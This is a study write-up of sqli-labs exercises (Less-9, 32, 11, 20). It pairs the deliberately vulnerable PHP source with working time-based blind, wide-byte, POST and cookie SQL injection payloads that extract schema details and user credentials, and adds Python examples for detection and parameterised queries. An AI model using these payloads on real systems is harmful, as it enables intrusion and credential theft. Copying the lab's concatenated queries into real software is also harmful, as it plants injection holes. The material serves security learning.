SQL Injection (Part 2)
Preface
These are my own notes; if anything is wrong, please point it out.
Less-9
Source
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-9 Blind- Time based- Single Quotes- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else {
echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-9.jpg" /></center>
</body>
</html>
Hands-on
- Get the length of the database name
sql.test/less-9/?id= 1' and if((length(database()))=8, 1, sleep(5)) --+
Note: when the length is correct the page loads right away; otherwise it sleeps for 5 seconds (very slow). See the usage of the if() function.
- Get the database name
sql.test/less-9/?id= 1' and if((ascii(substr(database(),1,1)))=115, 1, sleep(5)) --+
Note: Burp Suite can be used here to brute-force the value.
- Get the number of tables
sql.test/less-9/?id= 1' and if((select count(table_name) from information_schema.tables where table_schema=database()) =4, 1, sleep(5)) --+
- Get the length of a table name
sql.test/less-9/?id= 1' and if((select length(table_name) from information_schema.tables where table_schema=database() limit 0, 1) =6, 1, sleep(5)) --+
Note: this only gets the length of the first table name; to get the others, change the number after limit.
- Get a table name
sql.test/less-9/?id= 1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0, 1),1,1)))=101, 1, sleep(5)) --+
Note: Burp Suite can be used here to brute-force the first table name in database().
- Get the total number of columns in a table
sql.test/less-9/?id= 1' and if((select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security') = 3, 1, sleep(5)) --+
Note: gets the total number of columns in the users table.
- Get the length of a column name
sql.test/less-9/?id= 1' and if((select length(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 0,1) = 2 , 1, sleep(5)) --+
Note: gets the length of the first column name of the users table.
- Get the column names of a table
sql.test/less-9/?id= 1' and if((ascii(substr((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA='security' limit 0,1), 1, 1))) = 105 , 1, sleep(5)) --+
Note: Burp Suite can be used here to brute-force the first column name of the users table (given its length).
- Get the length of a column value
sql.test/less-9/?id= 1' and if( (select length(username) from users limit 0,1) = 4 , 1, sleep(5)) --+
Note: gets the length of the first value in the username column of the users table.
- Get a column value
sql.test/less-9/?id= 1' and if((ascii(substr((select username from users limit 0,1), 1, 1))) = 68, 1, sleep(5)) --+
Note: Burp Suite can be used here to brute-force the first value in the username column of the users table (given its length).
- Personal summary:
- This is the time-based variant of blind injection: the response is identical in every case (empty result, syntax error, or a result with rows), so the only way to tell the cases apart is by how long the response takes.
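As an added example, not from the original post or from the sqli-labs code: the lab appends every id parameter to result.txt as `ID:<value>`, so that file is the obvious place to look for the payload shapes used above. The Python below is a small rule-based scanner over constructed log lines in that format; the rule names, regexes and sample lines are my own, and the log is handled as bytes because a wide-byte probe carries a raw 0xDF byte rather than valid UTF-8 text.

```python
import re

# Constructed sample of the lab's result.txt: it appends "ID:" + the raw id parameter per request.
# Kept as bytes because the wide-byte probe carries a raw 0xDF byte, not valid UTF-8 text.
SAMPLE_LOG = (
    b"ID:1\n"
    b"ID:1' and if((length(database()))=8, 1, sleep(5)) --+\n"
    b"ID:1' and if((ascii(substr(database(),1,1)))=115, 1, sleep(5)) --+\n"
    b"ID:2\n"
    b"ID:\xdf' union select 1, 2, database() #\n"
    b"ID:3' and benchmark(5000000, md5(1)) --+\n"
)

# Rule names are my own; each regex describes one shape seen in the walkthrough above.
RULES = {
    "time_based":      re.compile(rb"\b(sleep|benchmark)\s*\(", re.I),   # delay primitives
    "conditional":     re.compile(rb"\bif\s*\(", re.I),                  # if(cond, ok, sleep)
    "union_select":    re.compile(rb"\bunion\s+(all\s+)?select\b", re.I),
    "schema_probe":    re.compile(rb"information_schema\.", re.I),
    "comment_tail":    re.compile(rb"(--\s|--\+|#|/\*)"),                # trailing comment
    "wide_byte_quote": re.compile(rb"[\x81-\xfe]['\"]"),                 # lead byte then quote
}

def classify(line: bytes) -> list[str]:
    """Names of all rules matched by one result.txt line; empty for a benign numeric id."""
    if not line.startswith(b"ID:"):
        return []
    value = line[3:]
    return [name for name, rx in RULES.items() if rx.search(value)]

def scan(log: bytes) -> list[tuple[int, list[str]]]:
    """Scan a whole log and return (line_number, matched_rules) for every flagged line."""
    hits = []
    for number, line in enumerate(log.splitlines(), start=1):
        tags = classify(line)
        if tags:
            hits.append((number, tags))
    return hits

if __name__ == "__main__":
    for number, tags in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(tags)}")
```

A single rule hit is only a signal; the time-based probes above fire on several rules at once (a delay primitive, an if() wrapper and a trailing comment), and that combination is a much stronger indicator than any one pattern.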
Less-32
Source
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-32 **Bypass addslashes()**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="5" color="#00FF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
function check_addslashes($string)
{
$string = preg_replace('/'.preg_quote('\\').'/', "\\\\\\", $string); //escape any backslash
$string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash
$string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash
return $string;
}
// take the variables
if(isset($_GET['id']))
{
$id=check_addslashes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
echo $sql;
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FF00">';
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else {
echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-32.jpg" />
</br>
</br>
</br>
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
function strToHex($string)
{
$hex='';
for ($i=0; $i < strlen($string); $i++)
{
$hex .= dechex(ord($string[$i]));
}
return $hex;
}
echo "Hint: The Query String you input is escaped as : ".$id ."<br>";
echo "The Query String you input in Hex becomes : ".strToHex($id). "<br>";
?>
</center>
</font>
</body>
</html>
Hands-on
- Check whether wide-byte injection exists
http://sql.test/Less-32/?id=%df'
Note: before the SQL is run, %df' is escaped to %df\', which the GBK connection reads as one Chinese character followed by a bare ', so that ' closes the string early while the later ' in the query is not commented out; the resulting error shows that wide-byte injection exists.
- Get the current database name
http://sql.test/Less-32/?id=%df' union select 1, 2, database() %23
- Get the number of tables in the database
http://sql.test/Less-32/?id=%df' union select 1, 2, (select count(table_name) from information_schema.tables where table_schema=database())%23
- Get a table name
http://sql.test/Less-32/?id=%df' union select 1, 2, (select table_name from information_schema.tables where table_schema=database() limit 3, 1)%23
- Get the number of columns in the table
http://sql.test/Less-32/?id=%df' union select 1, 2, (select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=((select table_name from information_schema.tables where table_schema=database() limit 3, 1)) and TABLE_SCHEMA=database()) %23
- Get the column names of the table
http://sql.test/Less-32/?id=%df' union select 1, 2, (select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=(select table_name from information_schema.tables where table_schema=database() limit 3, 1) and TABLE_SCHEMA=database() limit 0,1) %23
- Get the data
http://sql.test/Less-32/?id=%df' union select id, username, password from users limit 0, 1 %23
Note: only three columns can be retrieved per query; if there are more than three columns, retrieve them in several queries.
- Personal summary:
- This is wide-byte injection. Its precondition is that the database connection uses the GBK encoding (where one Chinese character is two bytes); the PHP source escapes the input ' into \' before running the SQL, so the preceding byte pairs with the backslash to form a Chinese character and the ' closes the string early. (In UTF-8 a Chinese character is three bytes.)
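As an added example, not from the original post or from sqli-labs: the Python below emulates check_addslashes() byte-wise, decodes the result under GBK and under UTF-8 to show where the escaping backslash goes, and then shows the charset-aware alternative (decode strictly first, escape on characters, re-encode), which is what a database client does once it has been told the connection charset. Function names and sample inputs are my own.

```python
def naive_escape(raw: bytes) -> bytes:
    """Byte-wise escaping in the style of the lab's check_addslashes():
    backslash first, then single and double quotes (constructed emulation)."""
    return (raw.replace(b"\\", b"\\\\")
               .replace(b"'", b"\\'")
               .replace(b'"', b'\\"'))

def count_bare_quotes(text: str) -> int:
    """Count quote characters an SQL parser would treat as string delimiters,
    i.e. quotes not preceded by an escaping backslash."""
    bare = 0
    escaped = False
    for ch in text:
        if escaped:
            escaped = False
            continue
        if ch == "\\":
            escaped = True
        elif ch in ("'", '"'):
            bare += 1
    return bare

def quote_survives(raw: bytes, charset: str) -> bool:
    """Escape byte-wise, then decode the way a server using `charset` would.
    True means a quote is still live after escaping, i.e. the escaping failed."""
    decoded = naive_escape(raw).decode(charset, errors="replace")
    return count_bare_quotes(decoded) > 0

def charset_aware_escape(raw: bytes, charset: str) -> bytes:
    """Decode strictly, escape on characters, re-encode. A dangling lead byte such
    as 0xDF can no longer pair with the escaping backslash; malformed input is
    rejected with UnicodeDecodeError instead of being passed through."""
    text = raw.decode(charset)  # raises on b"\xdf'" under GBK: 0x27 is not a valid trail byte
    text = text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return text.encode(charset)

if __name__ == "__main__":
    probe = b"\xdf'"  # the Less-32 probe %df' as raw bytes
    print("GBK   :", quote_survives(probe, "gbk"))    # True: 0xDF 0x5C became one character
    print("UTF-8 :", quote_survives(probe, "utf-8"))  # False: 0xDF alone is invalid, backslash stays
    print("plain :", quote_survives(b"1'", "gbk"))     # False: ordinary input is escaped fine
```

Under GBK the two bytes 0xDF 0x5C decode to a single character, so the backslash that the escaping inserted simply disappears from the SQL text. In PHP the equivalent fix is to declare the charset through the client library (mysqli_set_charset(), or mysql_set_charset() for the old extension) instead of with SET NAMES, so that escaping and the server agree on character boundaries, or better still to use prepared statements so the input never becomes SQL text at all.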
Less-11
Source
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-11- Error Based- String</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
<div align="center" style="margin:40px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;">
<div style="padding-top:10px; font-size:15px;">
<!--Form to post the data for sql injections Error based SQL Injection-->
<form action="" name="form1" method="post">
<div style="margin-top:15px; height:30px;">Username :
<input type="text" name="uname" value=""/>
</div>
<div> Password :
<input type="text" name="passwd" value=""/>
</div></br>
<div style=" margin-top:9px;margin-left:90px;">
<input type="submit" name="submit" value="Submit" />
</div>
</form>
</div></div>
<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
<font size="6" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname);
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
echo $sql;
echo "<br/>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
</font>
</div>
</body>
</html>
Hands-on
- Check whether an injection point exists
www' or 1 = 1 #
Note: there is output (Your Login name:Dumb; Your Password:Dumb), which shows that POST injection exists.
- Find the echo positions
www' union select 1, 2 #
- Get the current database name
www' union select 1, database() #
- Get the number of tables in the database
www' union select 1, (select count(table_name) from information_schema.tables where table_schema=database()) #
- Get a table name
www' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 3, 1) #
- Get the number of columns in the result set of the query against the users table
www' or 1 = 1 order by 2 #
- Get the number of columns in the table
www' union select 1, (select count(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME="users" and TABLE_SCHEMA=database()) #
- Get the column names of the table
www' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME="users" and TABLE_SCHEMA=database() limit 0,1) #
- Get the table data
www' union select username,password from users limit 1,1 #
Note: only two columns of one record can be retrieved per query.
- Personal summary:
- When typing the input, the -- comment needs a space both before and after it, while the # comment needs a space before it (nothing special after it).
- Note that in the input box %23 does not stand for a comment.
Less-20
Source
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-20 Cookie Injection- Error Based- string</title>
</head>
<body bgcolor="#000000">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
//no cookie yet: first login
if(!isset($_COOKIE['uname']))
{
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome <font color='#FF0000'> Dhakkan </font><br></div>";
echo "<div align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
echo "<div style='padding-top:10px; font-size:15px;'>";
echo "<!--Form to post the contents -->";
echo '<form action=" " name="form1" method="post">';
echo ' <div style="margin-top:15px; height:30px;">Username : ';
echo ' <input type="text" name="uname" value=""/> </div>';
echo ' <div> Password : ';
echo ' <input type="text" name="passwd" value=""/></div></br>';
echo ' <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
echo '</form>';
echo '</div>';
echo '</div>';
echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
echo '<font size="3" color="#FFFF00">';
echo '<center><br><br><br>';
echo '<img src="../images/Less-20.jpg" />';
echo '</center>';
function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,20); // truncation (see comments)
}
if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
{
$value = stripslashes($value);
}
if (!ctype_digit($value)) // Quote if not a number
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
echo "<br>";
echo "<br>";
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
if($row1)
{
echo '<font color= "#FFFF00" font size = 3 >';
setcookie('uname', $cookee, time()+3600);
header ('Location: index.php');
echo "I LOVE YOU COOKIES";
echo "</font>";
echo '<font color= "#0000ff" font size = 3 >';
//echo 'Your Cookie is: ' .$cookee;
echo "</font>";
echo "<br>";
print_r(mysql_error());
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
echo "</font>";
echo '</font>';
echo '</div>';
}
//cookie present
else
{
//print the related information
if(!isset($_POST['submit']))
{
$cookee = $_COOKIE['uname'];
$format = 'D d M Y - H:i:s';
$timestamp = time() + 3600;
echo "<center>";
echo '<br><br><br>';
echo '<img src="../images/Less-20.jpg" />';
echo "<br><br><b>";
echo '<br><font color= "red" font size="4">';
echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
echo "</font><br>";
echo '<font color= "cyan" font size="4">';
echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
echo "</font><br>";
echo '<font color= "#FFFF00" font size = 4 >';
echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
echo '<font color= "orange" font size = 5 >';
echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
echo "<br></font>";
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
{
die('Issue with your mysql: ' . mysql_error());
}
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "pink" font size="5">';
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo '<font color= "grey" font size="5">';
echo 'Your Password:' .$row['password'];
echo "</font></b>";
echo "<br>";
echo 'Your ID:' .$row['id'];
}
else
{
echo "<center>";
echo '<br><br><br>';
echo '<img src="../images/slap1.jpg" />';
echo "<br><br><b>";
//echo '<img src="../images/Less-20.jpg" />';
}
echo '<center>';
echo '<form action="" method="post">';
echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';
echo '</form>';
echo '</center>';
}
//delete the cookie
else
{
echo '<center>';
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo "<br>";
echo '<font color= "#FFFF00" font size = 6 >';
echo " Your Cookie is deleted";
setcookie('uname', $row1['username'], time()-3600);
header ('Location: index.php');
echo '</font></center></br>';
}
echo "<br>";
echo "<br>";
//header ('Location: main.php');
echo "<br>";
echo "<br>";
//echo '<img src="../images/slap.jpg" /></center>';
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'Cookie:'.$cookee."\n");
fclose($fp);
}
?>
</body>
</html>
Note: header() only forwards the HTTP headers, so the username, password and the like are no longer present.
Hands-on
Because the source truncates the submitted username and password to 20 characters and escapes them, injection there is not easy;
but the cookie it issues receives no further filtering, so one can proxy through Burp and tamper with the intermediate message (the second request). Further reading: intercepting response messages with Burp Suite.
- Get the number of columns in the back-end query's result set
Note: no error, which shows the column count is 3
- Find the echo positions
' union select 1,2,3
Note: limit 0, 1 is not needed, because the query result has only one record and mysql_fetch_array fetches only one row at a time
- Get the current database name
- Get the number of tables in the current database
- Get the table names of the database
- Get the number of columns in the table
- Get the column names
- Get the data
- Personal summary:
- This is cookie injection; as it stands, one can only inject, and so obtain all the information, after knowing one valid username and password (judging from the source above alone).
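As an added example covering both Less-11 (the POST login query) and Less-20 (the lookup by the uname cookie), not taken from the post or from sqli-labs: the Python below builds a throw-away SQLite table in memory standing in for the users table, runs the lab's string-concatenation pattern beside a parameterised query, and shows that the same input bypasses authentication in one and is treated as an ordinary (non-existent) username in the other. SQLite has no `#` comment, so the payloads use the `-- ` form, which the Less-11 summary notes also works in MySQL when surrounded by spaces. Table contents, the second user and the function names are constructed.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the lab's users table (id, username, password)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("Dumb", "Dumb"), ("second_user", "constructed-password")],
    )
    return conn

def login_concat(conn, uname: str, passwd: str):
    """Less-11 pattern: input spliced straight into the SQL text (vulnerable)."""
    sql = (f"SELECT username, password FROM users "
           f"WHERE username='{uname}' and password='{passwd}' LIMIT 1")
    return conn.execute(sql).fetchone()

def login_param(conn, uname: str, passwd: str):
    """Hardened form: placeholders keep the input as data, never as SQL."""
    sql = "SELECT username, password FROM users WHERE username=? and password=? LIMIT 1"
    return conn.execute(sql, (uname, passwd)).fetchone()

def profile_by_cookie_concat(conn, cookie_uname: str):
    """Less-20 pattern: the uname cookie is trusted and spliced into the query (vulnerable)."""
    sql = f"SELECT id, username, password FROM users WHERE username='{cookie_uname}' LIMIT 1"
    return conn.execute(sql).fetchone()

def profile_by_cookie_param(conn, cookie_uname: str):
    """Hardened form of the cookie lookup; a tampered cookie simply matches no row."""
    sql = "SELECT id, username, password FROM users WHERE username=? LIMIT 1"
    return conn.execute(sql, (cookie_uname,)).fetchone()

if __name__ == "__main__":
    db = make_db()
    bypass = "www' or 1 = 1 -- "            # the Less-11 probe, in the -- comment form
    print("concat login :", login_concat(db, bypass, "anything"))    # a row, without knowing a password
    print("param  login :", login_param(db, bypass, "anything"))     # None
    tampered = "' union select 1,2,3 -- "   # the Less-20 echo-position probe, sent via the cookie
    print("concat cookie:", profile_by_cookie_concat(db, tampered))  # (1, 2, 3) echoed back
    print("param  cookie:", profile_by_cookie_param(db, tampered))   # None
```

The parameterised versions are the fix for every lesson on this page, including Less-32: the driver sends the query text and the values separately, so neither a quote nor a stray lead byte in the input can change the statement's structure.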
URL encoding of special characters
| Character | URL-encoded value |
|---|---|
| space | %20 |
| " | %22 |
| # | %23 |
| % | %25 |
| & | %26 |
| ( | %28 |
| ) | %29 |
| + | %2B |
| , | %2C |
| / | %2F |
| : | %3A |
| ; | %3B |
| < | %3C |
| = | %3D |
| > | %3E |
| ? | %3F |
| @ | %40 |
| \ | %5C |
| \| | %7C |
MySQL functions
① group_concat() is usually used together with GROUP BY (look it up online for details); without GROUP BY it concatenates all values of that one column, separated by commas;
② user() returns the user name and host name of the current MySQL connection;
③ The information_schema database is built in after MySQL is installed; it records all databases, and its tables table holds the table names of every database.
④ length() returns the length of a string
⑤ ascii() returns the ASCII code of a string
⑥ substr(x, num1, num2) takes a substring of x starting at position num1, num2 characters long
⑦ sleep(x) delays execution by x seconds
⑧ if(exp1, exp2, exp3): if the first expression/condition is true, exp2 is evaluated, otherwise exp3